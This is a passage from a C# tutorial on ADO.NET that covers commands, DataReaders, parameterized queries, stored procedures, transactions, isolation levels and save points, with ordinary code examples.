var providerName = connectionDetails.ProviderName;
var connectionString = connectionDetails.ConnectionString;

var dbFactory = DbProviderFactories.GetFactory(providerName);

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmd = cn.CreateCommand();

    cmd.CommandText = "Select * from MyTable";
    cmd.CommandType = CommandType.Text;
    cmd.Connection = cn;
}

The command should be passed the connection via the Connection property.

The command object will not touch the database until ExecuteReader, ExecuteNonQuery or an equivalent method has been called.

DataReader

The DataReader class provides a read-only, forward-only view of the data returned from a configured command object.

A DataReader is instantiated by calling ExecuteReader upon the command object.

The DataReader exposes a forward only iterator via the Read method which returns false when the collection has been completely iterated.

The DataReader represents both the collection of records and the current record; access to the data is made by calling methods upon the DataReader.

DataReader implements IDisposable and should be used within a using scope.

Data can be accessed by field name or ordinal position via the indexer [], which returns the data cast to object. Alternatively, methods exist to get the data as any .NET primitive type.

using (var dr = cmd.ExecuteReader())
{
    while (dr.Read())
    {
        var val1 = (string)dr["FieldName"];
        var val2 = (int)dr[0];

        // Get the field name or its ordinal position
        var name = dr.GetName(1);
        var pos = dr.GetOrdinal("FieldName");

        // Strongly typed data
        var val3 = dr.GetInt32(1);
        var val4 = dr.GetDecimal(2);
        var val5 = dr.GetDouble(3);
        var val6 = dr.GetString(4);

        var isNull = dr.IsDBNull(5);

        var fdType = dr.GetProviderSpecificFieldType(6);
    }
}

The IsDBNull method can be used to determine if a field contains a null. The provider-specific type of a field can be retrieved with the GetProviderSpecificFieldType method; GetFieldType returns the .NET type.
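These calls can be tried without a database: DataTable.CreateDataReader returns a DataTableReader, which behaves like any other DataReader. A self-contained sketch (the table and column names are illustrative):

```csharp
using System;
using System.Collections.Generic;
using System.Data;

var table = new DataTable();
table.Columns.Add("Name", typeof(string));
table.Columns.Add("Age", typeof(int));
table.Rows.Add("Alice", 30);
table.Rows.Add("Bob", DBNull.Value);

var rows = new List<string>();
using (var dr = table.CreateDataReader())
{
    while (dr.Read())
    {
        var name = dr.GetString(dr.GetOrdinal("Name"));
        // Guard with IsDBNull before calling a typed getter on a nullable field.
        var age = dr.IsDBNull(1) ? "unknown" : dr.GetInt32(1).ToString();
        rows.Add($"{name}:{age}");
    }
}
Console.WriteLine(string.Join(", ", rows)); // Alice:30, Bob:unknown
```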

Multiple Results

If the select statement of a command has multiple results the DataReader.NextResult() method exposes a forward only iterator through each result group:

string strSQL = "Select * From MyTable;Select * from MyOtherTable";

NextResult advances to the next result group; like Read, it returns false once the results have been exhausted. Note that the reader starts positioned on the first result set, so read it before calling NextResult:

using (var dr = cmd.ExecuteReader())
{
    do
    {
        while (dr.Read())
        {
        }
    } while (dr.NextResult());
}
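The same iteration can be exercised in memory: DataSet.CreateDataReader exposes each table in the set as a separate result set, much like a batched select statement would. A self-contained sketch with illustrative table names:

```csharp
using System;
using System.Collections.Generic;
using System.Data;

var ds = new DataSet();
var t1 = new DataTable();
t1.Columns.Add("A", typeof(int));
t1.Rows.Add(1);
t1.Rows.Add(2);
var t2 = new DataTable();
t2.Columns.Add("B", typeof(int));
t2.Rows.Add(3);
ds.Tables.Add(t1);
ds.Tables.Add(t2);

var counts = new List<int>();
using (var dr = ds.CreateDataReader())
{
    // The reader starts on the first result set, so read it
    // before calling NextResult.
    do
    {
        var rowCount = 0;
        while (dr.Read()) rowCount++;
        counts.Add(rowCount);
    } while (dr.NextResult());
}
Console.WriteLine(string.Join(",", counts)); // 2,1
```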

DataSet

A DataReader can be used to fill a DataTable or DataSet. We talk more about the DataSet within the disconnected layer in the next chapter.

var dtable = new DataTable();

using (var dr = cmd.ExecuteReader())
{
    dtable.Load(dr);
}
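A runnable sketch of the same call: here the reader comes from an in-memory table rather than a database command, but Load works the same way with any DataReader.

```csharp
using System;
using System.Data;

var source = new DataTable();
source.Columns.Add("Id", typeof(int));
source.Rows.Add(1);
source.Rows.Add(2);

// Load copies both the schema and the rows from the reader.
var dtable = new DataTable();
using (var dr = source.CreateDataReader())
{
    dtable.Load(dr);
}
Console.WriteLine(dtable.Rows.Count); // 2
```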

ExecuteNonQuery

ExecuteNonQuery allows execution of an insert, update or delete statement as well as executing a schema statement.

The method returns an integer representing the number of affected rows.

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmd = cn.CreateCommand();

    cmd.CommandText = @"Insert Into MyTable (FieldA) Values ('Hello')";
    cmd.CommandType = CommandType.Text;
    cmd.Connection = cn;

    var count = cmd.ExecuteNonQuery();
}

Command Parameters

Command parameters allow configuring stored procedure parameters as well as parameterized sql statements which can help protect against SQL injection attacks.

It is strongly advised that any information collected from a user should be sent to the database as a parameter, regardless of whether it is to be persisted or used within a predicate.

Parameters can be added with SqlCommand.Parameters.AddWithValue or by creating a DbParameter instance via CreateParameter.

The example below shows the latter.

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmd = cn.CreateCommand();

    cmd.CommandText = @"Insert Into MyTable (FieldA) Values (@Hello)";
    cmd.CommandType = CommandType.Text;

    var param = cmd.CreateParameter();

    param.ParameterName = "@Hello";
    param.DbType = DbType.String;
    param.Value = "Value";
    param.Direction = ParameterDirection.Input;
    cmd.Parameters.Add(param);

    cmd.Connection = cn;

    var count = cmd.ExecuteNonQuery();
}

The DbParameter has a DbType property which allows setting the type of the parameter; it is vendor agnostic.

SqlParameter and MySqlParameter also provide SqlDbType and MySqlDbType respectively, which can be used to set the type from a vendor specific enum. Setting the DbType keeps the vendor specific property in sync and vice versa.

Executing a Stored Procedure

A stored procedure is executed by configuring a DbCommand against the name of the stored procedure along with any required parameters followed by calling ExecuteScalar or ExecuteReader.

ExecuteScalar is used to return a single value. If multiple result sets, rows and columns are returned it will return the first column from the first row in the first result set.

Parameters can either be input or output.

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmd = cn.CreateCommand();
    cmd.CommandText = "spGetFoo";
    cmd.Connection = cn;

    cmd.CommandType = CommandType.StoredProcedure;

    // Input param.
    var paramOne = cmd.CreateParameter();
    paramOne.ParameterName = "@inParam";
    paramOne.DbType = DbType.Int32;
    paramOne.Value = 1;
    paramOne.Direction = ParameterDirection.Input;
    cmd.Parameters.Add(paramOne);

    // Output param.
    var paramTwo = cmd.CreateParameter();
    paramTwo.ParameterName = "@outParam";
    paramTwo.DbType = DbType.String;
    paramTwo.Size = 10;
    paramTwo.Direction = ParameterDirection.Output;
    cmd.Parameters.Add(paramTwo);

    // Execute the stored proc.
    var result = cmd.ExecuteScalar();

    // Read the output param.
    var outParam = (string)cmd.Parameters["@outParam"].Value;

    // This can be read from the parameter directly
    var outParam2 = (string)paramTwo.Value;
}

 

The ParameterDirection enum has the following members:

  • Input
    • The parameter is an input parameter (default).
  • InputOutput
    • The parameter is capable of both input and output.
  • Output
    • The parameter is an output parameter; it must be marked with the OUTPUT keyword in the parameter list of the stored procedure or user defined function.
  • ReturnValue
    • The parameter is a return value, scalar or similar, but not a result set. This is determined by the return statement in the stored procedure or user defined function.

If the stored procedure returns a result set and not a single value, ExecuteReader can be used to iterate over the results:

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmd = cn.CreateCommand();
    cmd.CommandText = "spGetFoo";
    cmd.Connection = cn;

    cmd.CommandType = CommandType.StoredProcedure;

    using (var dr = cmd.ExecuteReader())
    {
        do
        {
            while (dr.Read())
            {
            }
        } while (dr.NextResult());
    }
}

Database Transactions

When a database operation involves more than one write action, it is essential that all the actions are wrapped up in a single unit of work called a database transaction.

ACID

The desired characteristics of a transaction are defined by the term ACID:

  • Atomicity
    • All changes within a unit of work complete or none complete; they are atomic.
  • Consistency
    • The state of the data is consistent and valid. If upon completing all of the changes the data is considered invalid, all the changes are undone to return the data to its original state.
  • Isolation
    • All changes within a unit of work occur in isolation from other readable and writable transactions. No one can see any changes until all changes have been completed in full.
  • Durability
    • Once all the changes within a unit of work have completed, all the changes will be persisted.

Syntax

A transaction is started through the connection object and attached to any command which should be run in the same transaction.

Commit should be called on the transaction upon successful completion, while Rollback should be called if an error occurred. This can be achieved with a try catch statement:

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmdOne = cn.CreateCommand();
    cmdOne.CommandText = "spUpdateFoo";
    cmdOne.Connection = cn;
    cmdOne.CommandType = CommandType.StoredProcedure;

    var cmdTwo = cn.CreateCommand();
    cmdTwo.CommandText = "spUpdateMoo";
    cmdTwo.Connection = cn;
    cmdTwo.CommandType = CommandType.StoredProcedure;

    var tran = cn.BeginTransaction();

    try
    {
        cmdOne.Transaction = tran;
        cmdTwo.Transaction = tran;

        cmdOne.ExecuteNonQuery();
        cmdTwo.ExecuteNonQuery();

        tran.Commit();
    }
    catch (Exception ex)
    {
        tran.Rollback();
    }
}

The DbTransaction class implements IDisposable and can therefore be used within a using statement rather than a try catch. The Dispose method will be called implicitly upon leaving the scope of the using statement; this will cause any uncommitted changes to be rolled back while allowing any committed changes to remain as persisted. This is the preferred syntax for writing transactions in ADO.NET:

var connectionDetails =
    ConfigurationManager.ConnectionStrings["MyDatabase"];

var providerName = connectionDetails.ProviderName;
var connectionString = connectionDetails.ConnectionString;

var dbFactory = DbProviderFactories.GetFactory(providerName);

using (var cn = dbFactory.CreateConnection())
{
    cn.ConnectionString = connectionString;
    cn.Open();

    var cmdOne = cn.CreateCommand();
    cmdOne.CommandText = "spUpdateFoo";
    cmdOne.Connection = cn;
    cmdOne.CommandType = CommandType.StoredProcedure;

    var cmdTwo = cn.CreateCommand();
    cmdTwo.CommandText = "spUpdateMoo";
    cmdTwo.Connection = cn;
    cmdTwo.CommandType = CommandType.StoredProcedure;

    using (var tran = cn.BeginTransaction())
    {
        cmdOne.Transaction = tran;
        cmdTwo.Transaction = tran;

        cmdOne.ExecuteNonQuery();
        cmdTwo.ExecuteNonQuery();

        tran.Commit();
    }
}

Concurrency Issues

Writing to and reading from a database can suffer from concurrency issues when multiple transactions occur at the same time.

  • Lost Update
    • Two or more transactions perform write actions on the same record at the same time without being aware of each other’s changes. The last transaction persists its state of the data, overwriting any changes to the same fields made by the first.
  • Dirty Read
    • Data is read while a transaction has started but not finished writing. The data is considered dirty as it represents a state which should never have existed.
  • Nonrepeatable Read
    • A transaction reads a record multiple times and is presented with multiple versions of the same record due to another transaction writing to it.
  • Phantom Read
    • Data from a table is read while inserts or deletes are being made. The result set is missing data from inserts which have not finished, and contains records no longer found within the table due to the deletes.

Isolation Level

Isolation levels define rules for accessing data when another transaction is running.

The level is set when creating a transaction with the BeginTransaction method and can be read with the IsolationLevel property:

using (var tran = cn.BeginTransaction(IsolationLevel.ReadCommitted))
{
    cmdOne.Transaction = tran;
    cmdTwo.Transaction = tran;
    IsolationLevel isolationLevel = tran.IsolationLevel;

    cmdOne.ExecuteNonQuery();
    cmdTwo.ExecuteNonQuery();

    tran.Commit();
}

The IsolationLevel enum runs from the lowest level of isolation, ReadUncommitted, up to the highest, Serializable; the amount of concurrency allowed runs in the opposite direction. Chaos, Snapshot and Unspecified sit outside this low to high range.
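The underlying numeric values of the enum follow the same low to high ordering, which can be checked directly:

```csharp
using System;
using System.Data;

// Each step up in isolation has a larger underlying value.
Console.WriteLine((int)IsolationLevel.ReadUncommitted < (int)IsolationLevel.ReadCommitted); // True
Console.WriteLine((int)IsolationLevel.ReadCommitted < (int)IsolationLevel.RepeatableRead);  // True
Console.WriteLine((int)IsolationLevel.RepeatableRead < (int)IsolationLevel.Serializable);   // True
```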

 

  • Unspecified
    • The isolation level is undetermined. A different isolation level than the one specified is being used, but the level cannot be determined. Often found in older technologies which work differently from current standards, such as OdbcTransaction.
  • ReadUncommitted
    • A transaction reading data places no shared or exclusive locks upon the data being read. Other transactions are free to insert, delete and edit the data being read. This level allows a high degree of concurrency between transactions, which is good for performance, but suffers from the possibility of dirty, nonrepeatable and phantom reads.
  • ReadCommitted
    • A transaction reading data places a shared lock on the data being read. Other transactions are free to insert or delete rows but may not edit the data being read. This level does not suffer from dirty reads, though it does suffer from nonrepeatable and phantom reads. This is the default isolation level in most databases.
  • RepeatableRead
    • A transaction reading data holds its locks on that data for the duration of the transaction. Other transactions are free to insert data into the table but may not edit or delete the data being read. This level does not suffer from dirty or nonrepeatable reads, though it does suffer from phantom reads.
  • Serializable
    • A transaction reading data locks the range of data being read. Other transactions may not insert, update or delete the data being read. This level does not suffer from dirty, nonrepeatable or phantom reads, but allows the least concurrency and is bad for performance.
  • Chaos
    • Allows dirty, lost update, phantom and nonrepeatable reads, but not concurrently with transactions running at a higher isolation level.
  • Snapshot
    • Every writable transaction causes a virtual snapshot of the data as it was before the transaction began. No exclusive lock is taken on the data; isolation is guaranteed by allowing other transactions to read the data in the state it was in before the writable transaction started.

Checkpoints

Checkpoints provide a way of defining temporary save points; data can be rolled back to these intermediary points.

Save does not persist the changes to the database and a Commit would still be required upon completion of all writable transactions.

using (var tran = cn.BeginTransaction(IsolationLevel.ReadCommitted))
{
    cmdOne.Transaction = tran;
    cmdTwo.Transaction = tran;

    cmdOne.ExecuteNonQuery();

    tran.Save("Charlie");

    cmdTwo.ExecuteNonQuery();

    tran.Rollback("Charlie");
    tran.Commit();
}

Not all database vendors provide checkpoints. SQL Server does; MySQL does too, though the MySql Connector ADO.NET data provider does not currently appear to support this feature.

Nested Transactions

If the database vendor / ADO.NET data provider does not support checkpoints but does allow nested transactions, a similar result can be achieved by creating a new transaction within the scope of another transaction.

using (var tranOuter = cn.BeginTransaction())
{
    cmdOne.Transaction = tranOuter;
    cmdOne.ExecuteNonQuery();

    using (var tranInner = cn.BeginTransaction())
    {
        cmdTwo.Transaction = tranInner;

        cmdTwo.ExecuteNonQuery();
        tranInner.Rollback();
    }

    tranOuter.Commit();
}